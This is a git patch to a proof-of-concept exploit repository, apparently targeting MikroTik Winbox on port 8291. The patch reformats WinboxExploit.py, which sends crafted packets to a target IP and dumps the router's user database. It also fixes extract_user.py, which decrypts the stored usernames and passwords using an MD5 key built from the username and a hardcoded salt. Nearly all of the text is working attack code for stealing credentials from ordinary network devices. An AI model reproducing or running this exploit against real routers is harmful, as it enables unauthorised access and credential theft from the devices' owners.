From 79ae8a097ec2dd8a4b074c7b76afdb00796720d8 Mon Sep 17 00:00:00 2001 From: Rennan Cockles Date: Mon, 6 Aug 2018 12:28:54 -0300 Subject: [PATCH] PEP-8, python2 compatible and fix in decrypt_password function --- WinboxExploit.py | 59 ++++++++++++++++++++++++------------------------ extract_user.py | 23 +++++++++++-------- 2 files changed, 44 insertions(+), 38 deletions(-) diff --git a/WinboxExploit.py b/WinboxExploit.py index 3d7487b..2b6b9a7 100644 --- a/WinboxExploit.py +++ b/WinboxExploit.py @@ -30,33 +30,34 @@ 0x00, 0x02, 0x00, 0x00, 0x00] - if __name__ == "__main__": - try: - ip = sys.argv[1] - except: - print("Usage: python PoC.py [IP_ADDRESS]") - - #Initialize Socket - s = socket.socket() - s.settimeout(3) - s.connect((ip, 8291)) - - #Convert to bytearray for manipulation - a = bytearray(a) - b = bytearray(b) - - #Send hello and recieve the sesison id - s.send(a) - d = bytearray(s.recv(1024)) - - #Replace the session id in template - b[19] = d[38] - - #Send the edited response - s.send(b) - d = bytearray(s.recv(1024)) - - #Get results - print(ip) - dump(d[55:]) \ No newline at end of file + try: + ip = sys.argv[1] + except: + print("Usage: python PoC.py [IP_ADDRESS]") + exit(1) + + #Initialize Socket + s = socket.socket() + s.settimeout(3) + s.connect((ip, 8291)) + + #Convert to bytearray for manipulation + a = bytearray(a) + b = bytearray(b) + + #Send hello and recieve the sesison id + s.send(a) + d = bytearray(s.recv(1024)) + + #Replace the session id in template + b[19] = d[38] + + #Send the edited response + s.send(b) + d = bytearray(s.recv(1024)) + + #Get results + print("IP: %s" % ip) + print('') + dump(d[55:]) diff --git a/extract_user.py b/extract_user.py index 3b871f5..4a570a3 100644 --- a/extract_user.py +++ b/extract_user.py @@ -1,16 +1,19 @@ #!/usr/bin/env python3 -import sys, hashlib +import sys +import hashlib + def decrypt_password(user, pass_enc): key = hashlib.md5(user + b"283i4jfkai3389").digest() passw = "" for i in range(0, len(pass_enc)): - passw += chr(pass_enc[i] ^ key[i % len(key)]) - + passw += chr(pass_enc[i] ^ ord(key[i % len(key)])) + return passw.split("\x00")[0] + def extract_user_pass_from_entry(entry): user_data = entry.split(b"\x01\x00\x00\x21")[1] pass_data = entry.split(b"\x11\x00\x00\x21")[1] @@ -23,8 +26,8 @@ def extract_user_pass_from_entry(entry): return username, password -def get_pair(data): +def get_pair(data): user_list = [] entries = data.split(b"M2")[1:] @@ -35,18 +38,20 @@ def get_pair(data): continue pass_plain = decrypt_password(user, pass_encrypted) - user = user.decode("ascii") + user = user.decode("ascii") user_list.append((user, pass_plain)) return user_list + def dump(data): user_pass = get_pair(data) for u, p in user_pass: - print("User:", u) - print("Pass:", p) - print() + print("User: %s" % u) + print("Pass: %s" % p) + print('') + if __name__ == "__main__": if len(sys.argv) == 2: @@ -55,7 +60,7 @@ def dump(data): else: user_file = open(sys.argv[1], "rb").read() dump(user_file) - + else: print("Usage:") print("\tFrom file: \t", sys.argv[0], "user.dat")